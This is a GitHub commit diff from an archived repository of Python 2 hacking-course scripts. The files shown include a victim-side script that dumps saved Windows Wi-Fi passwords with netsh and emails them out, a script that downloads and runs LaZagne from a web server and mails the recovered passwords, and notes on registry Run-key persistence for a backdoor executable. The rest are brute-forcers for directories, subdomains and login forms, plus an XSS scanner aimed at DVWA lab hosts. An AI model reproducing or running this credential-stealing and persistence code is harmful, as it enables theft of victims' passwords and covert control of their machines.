Skip to content
This repository was archived by the owner on Aug 24, 2023. It is now read-only.

Commit 0f93525

Browse files
author
root
committed
Updated
1 parent 4fa67ef commit 0f93525

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

48 files changed

+23363
-61
lines changed

10 arpspoof_detector/arpspoof_detector.py

+3
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,7 @@
11
#!/usr/bin/python2
2+
#put the script in startup folder to run when the system boots
3+
#put in /etc/init.d/script.py make executable sudo chmod 755 /etc/init.d/scipt.py
4+
#Register script to be run at startup sudo update-rc.d superscript defaults
25

36
import scapy.all as scapy
47

11 execute_sys_cmd_report/report_windows_wifipassword_toemail.py renamed to 11 execute_sys_cmd_report/report_windows_wifi_password_to_email.py

+5-2
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
11
#!/usr/bin/python2.7
2+
#copy the script to victim machine this scripts should run on victim side windows_host
3+
#get saved wifi password and send a gather information to the mail address mention in the script
24

35
import subprocess
46
import smtplib
@@ -18,9 +20,10 @@ def send_mail(email,password,message):
1820

1921
result = ""
2022
for network_name in network_names_list:
21-
command = "netsh wlan show profile" +network_name+" key=clear"
23+
command = "netsh wlan show profile %s key=clear"%network_name
24+
#to get each and every network saved in the system
2225
current_result = subprocess.check_output(command,shell=True)
2326
result = result + current_result
2427

2528

26-
send_mail("mail@gmail.com","password",result)
29+
send_mail("user@mail.com","password",result)

13 recover_saved_passwd_on_target/download_lazagne_execute_report_toemail.py renamed to 13 recover_saved_passwd_on_target/report_windows_saved_password_to_email.py

+7
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,9 @@
11
#!/usr/bin/python2.7
2+
#The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.
3+
#https://github.com/AlessandroZ/LaZagne download this LaZagne file
4+
#it works on Windows, linux, mac but in this script we use lazagne.exe to recover passwords
5+
#copy the script to victim machine this scripts should run on victim side windows_host
6+
27

38
import requests
49
import subprocess
@@ -26,6 +31,8 @@ def send_mail(email,password,message):
2631
temp_directory = tempfile.gettempdir()
2732
os.chdir(temp_directory)
2833
download("http://localhost where lazagne .exe is stored")
34+
#host lazagne.exe on webserver put that link to download the lazagne.exe or
35+
#copy the lazagne.exe to victim and run his script in that path
2936
result = subprocess.check_output("lazagne.exe all",shell=True)
3037
send_mail("[email protected]","password",result)
3138
os.remove("lazagne.exe")

16 pyinstaller/pyinstaller.txt

+5-10
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
pyinstaller
22

3-
install pyinstaller to convert and pack all python code into 1 executable for the targetted operating system
3+
install pyinstaller to convert and pack all python code into 1 executable for the target operating system
44

55
pip install pyinstaller
66
#for linux
@@ -29,7 +29,7 @@ subprocess.check_output(commmad,shell=True,stderr=subprocess.DEVNULL,stdin=subpr
2929
DEVNULL = open(os.devnull,"wb")
3030
subprocess.check_output(commmad,shell=True,stderr=DEVNULL,stdin=DEVNULL)
3131

32-
To create a Python Executable it better to do that os environment
32+
To create a Python Executable it better to do in the same os environment similar to your target
3333
that is to run a py executable in windows
3434
create the py exe in windows operating system with the required lib and modules is installed and then put the py exe in victim system to run
3535

@@ -47,17 +47,12 @@ pip install in windows interpreter of linux
4747

4848
~/.wine/drive_c/Python27/wine python.exe -m pip install pyinstaller
4949

50+
51+
5052
Maintain persistent by puting the script in startup when the os boot these scripts always gets loaded
5153

5254
in windows Registry
5355
Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
5456

5557
in cmd prompt we can change value
56-
reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
57-
58-
Trojans
59-
60-
Trojans is a file that looks and function like a normal file like image,pdf,song
61-
62-
when the user clicks on it the image open on foreground and script run invisible in background
63-
58+
reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
File renamed without changes.

17 crawler/crawler_1.py

100644100755
File mode changed.

17 crawler/crawler_2.py

100644100755
File mode changed.

17 crawler/crawler_3.py

-26
This file was deleted.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
#!/usr/bin/python2.7
2+
#discover hidden directory by bruteforceing common directory name
3+
#if we get a respond then their is a directory then we also get the recursive of the directory.
4+
5+
import requests
6+
7+
def request(url):
8+
try:
9+
return requests.get("http://" + url)
10+
except requests.exceptions.ConnectionError:
11+
pass
12+
13+
path=[]
14+
def dirdiscover(url):
15+
with open("common_dir.txt","r") as wordlist_file:
16+
for line in wordlist_file:
17+
word = line.strip()
18+
test_url = url + "/" + word
19+
response = request(test_url)
20+
if response :
21+
print "[+] Discovered URL ----> " + test_url
22+
path.append(word)
23+
24+
url="192.168.44.101/mutillidae"
25+
#edit the url you want to scan
26+
dirdiscover(url)
27+
28+
#recursively gothrough each and every path
29+
for paths in path:
30+
dirdiscover(url+"/"+ paths)
31+
32+

17 crawler/testing_google_subdomain/crawler_1.py renamed to 17 crawler/testing_google_subdomain/discover_subdomains_of_domain.py

+7-5
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
1-
#!/usr/bin/python
1+
#!/usr/bin/python2.7
2+
#dicover subdomains of domain by bruteforcing common sub domains to the domain and
3+
#if we get a respond then the sub-domain exist
24

35
import requests
46
from datetime import datetime
@@ -12,20 +14,20 @@ def request(url):
1214
pass
1315

1416
target_url = "google.com"
15-
subdomain_list = []
17+
#subdomain_list = []
1618
file = open("googlesubdomain.txt","aw")
17-
with open("subdomain19","r") as wordlist_file:
19+
with open("top_10_subdomain.txt","r") as wordlist_file:
1820
for line in wordlist_file:
1921
word = line.strip()
2022
test_url = word + "." + target_url
2123
response = request(test_url)
2224
if response :
2325
print "[+] Discovered subdomain ----> "+test_url
24-
subdomain_list.append(test_url)
26+
#subdomain_list.append(test_url)
2527
file.write(test_url+"\n")
2628
file.close()
2729

2830
stop=datetime.now()
2931

3032
totaltime=stop-start
31-
print "TotalTime = ",totaltime
33+
print "\n[***]TotalTimeTaken = ",totaltime

17 crawler/testing_google_subdomain/googlesubdomain.txt

+12
Original file line numberDiff line numberDiff line change
@@ -153,3 +153,15 @@ hangout.google.com
153153
spaces.google.com
154154
gears.google.com
155155
answer.google.com
156+
sky.google.com
157+
surveys.google.com
158+
plus.google.com
159+
xmpp.google.com
160+
www.google.com
161+
mail.google.com
162+
www.google.com
163+
mail.google.com
164+
www.google.com
165+
mail.google.com
166+
www.google.com
167+
mail.google.com
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
www
2+
mail
3+
ftp
4+
localhost
5+
webmail
6+
smtp
7+
webdisk
8+
pop
9+
cpanel
10+
whm

18 spider/spider_3.py renamed to 18 spider/discover_urls_in_domain.py

+5-4
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
1-
#!/usr/bin/python
1+
#!/usr/bin/python2.7
2+
#discover urls in the domain by extract the href link in the content and crawl recursively to get all urls
23

34
import requests
45
import re
@@ -17,12 +18,12 @@ def crawl(url):
1718
for link in href_links:
1819
link = urlparse.urljoin(url,link)
1920

20-
if "#" in link: # #r refers to original page so avoid duplicate page again and again
21+
if "#" in link: # # refers to original page so avoid duplicate page again and again
2122
link = link.split("#")[0]
2223

2324
if target_url in link and link not in target_links: #to avoid repeating the same url
2425
target_links.append(link)
25-
print link
26-
crawl(link) #recurrsively crawling
26+
print "[+]urls --->",link
27+
crawl(link) #recursively crawling
2728

2829
crawl(target_url)

18 spider/spider_1.py

100644100755
+1-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@
33
import requests
44
import re
55

6-
target_url = "http://192.168.43.1"
6+
target_url = "http://192.168.44.101"
77

88
def extract_links_from(url):
99
response = requests.get(url)

18 spider/spider_2.py

100644100755
+1-1
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44
import re
55
import urlparse
66

7-
target_url = "http://192.168.43.1"
7+
target_url = "http://192.168.44.101"
88
target_links = []
99

1010
def extract_links_from(url):

19 bruteforce_login_form/bruteforce_login_form.py

100644100755
+4-1
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,7 @@
1-
#!/usr/bin/python
1+
#!/usr/bin/python2.7
2+
#bruteforce login form password with list of password by check the response content
3+
#if the response content has "Login failed" the password is incorrect so if it not the passed value is the password
4+
#Here i used Damn Vulnerable Web App to test you can get the Metasploitable2 virtualbox to use DVWA
25

36
import requests
47

19 bruteforce_login_form/extract_forms.py

100644100755
File mode changed.
+16
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
#!/usr/bin/python2.7
2+
#fill form with scipt by passing the value in data_dict then send that has POST Request
3+
#we can automate the form filling process by import data from file and by put in loop to fill each and every data and exit after filing the final data
4+
#the html_form.zip is given to test this script
5+
#put the files in /var/www/html/* location
6+
#start your own web server and test it !!
7+
8+
import requests
9+
10+
target_url = "http://127.0.0.1/process.php"
11+
data_dict = {"user":"admin","pass":"password","Login":"submit"}
12+
response = requests.post(target_url, data=data_dict)
13+
14+
print response
15+
print response.content
16+

19 bruteforce_login_form/post_request.py

100644100755
+2-1
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
#!/usr/bin/python
1+
#!/usr/bin/python2.7
22

33
import requests
44

@@ -8,3 +8,4 @@
88

99
print response
1010
print response.content
11+

20 vulnerability_scanner/scanner.py

100644100755
+30-8
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,16 @@
1-
#!/usr/bin/python
1+
#!/usr/bin/python2.7
2+
#find xss vulnerability in forms and urls this works by finding the urls and form and try to inject the code
3+
#if the code gets injected then it is vulnerable to xss
4+
#don't sticky to this code itself this is nothing explorer others xss_vulnerabilty code online
5+
#this works on Damn Vulnerable Web App only
26

37
import requests
48
import re
59
import urlparse
610
from BeautifulSoup import BeautifulSoup
711

812
class Scanner:
13+
914
def __init__(self,url,ignore_links):
1015
self.session = requests.Session()
1116
self.target_url = url
@@ -30,7 +35,7 @@ def crawl(self,url=None):
3035
if self.target_url in link and link not in self.target_links and link not in self.links_to_ignore:
3136
#to avoid repeating the same url and ignore logout url
3237
self.target_links.append(link)
33-
print link
38+
#print link
3439
self.crawl(link)
3540

3641
def extract_forms(self,url):
@@ -65,24 +70,41 @@ def run_scanner(self):
6570
print "[+] Testing form in " + link
6671
is_vulnerable_to_xss = self.test_xss_in_form(form,link)
6772
if is_vulnerable_to_xss:
68-
print "\n\n[***] XSS discovered in "+link+" in the follwing form"
73+
print "--"*50
74+
print "[*****] XSS discovered in "+link+" in the following form:"
6975
print form
70-
76+
print "--"*50
7177

7278
if "=" in link:
73-
print "\n\n[+] Testing " + link
79+
print "[+] Testing " + link
7480
if_vulnerable_to_xss = self.test_xss_in_link(link)
7581
if is_vulnerable_to_xss:
76-
print "[***] Discovered XSS in " + link
82+
print "--"*50
83+
print "[*****] Discovered XSS in " + link
84+
print link
85+
print "--"*50
7786

7887
def test_xss_in_link(self,url):
7988
xss_test_script = "<sCript>alert('test')</scriPt>"
8089
url = url.replace("=","="+ xss_test_script)
8190
response = self.session.get(url)
82-
8391
return xss_test_script in response.content
8492

8593
def test_xss_in_form(self,form,url):
8694
xss_test_script = "<sCript>alert('test')</scriPt>"
8795
response = self.submit_form(form,xss_test_script,url)
88-
return xss_test_script in response.content
96+
return xss_test_script in response.content
97+
98+
99+
target_url = "http://192.168.44.101/dvwa/"
100+
links_to_ignore = ["http://192.168.44.101/dvwa/logout.php"]
101+
vuln_scanner = Scanner(target_url,links_to_ignore)
102+
103+
data_dict = {"username":"admin","password":"password","Login":"submit"}
104+
vuln_scanner.session.post("http://192.168.44.101/dvwa/login.php",data=data_dict)
105+
#to login to get more links to test
106+
107+
vuln_scanner.crawl()
108+
#crawl through the links
109+
vuln_scanner.run_scanner()
110+
#run scan on each links crawled

20 vulnerability_scanner/vulnerability_scanner.py

100644100755
File mode changed.

0 commit comments

Comments
 (0)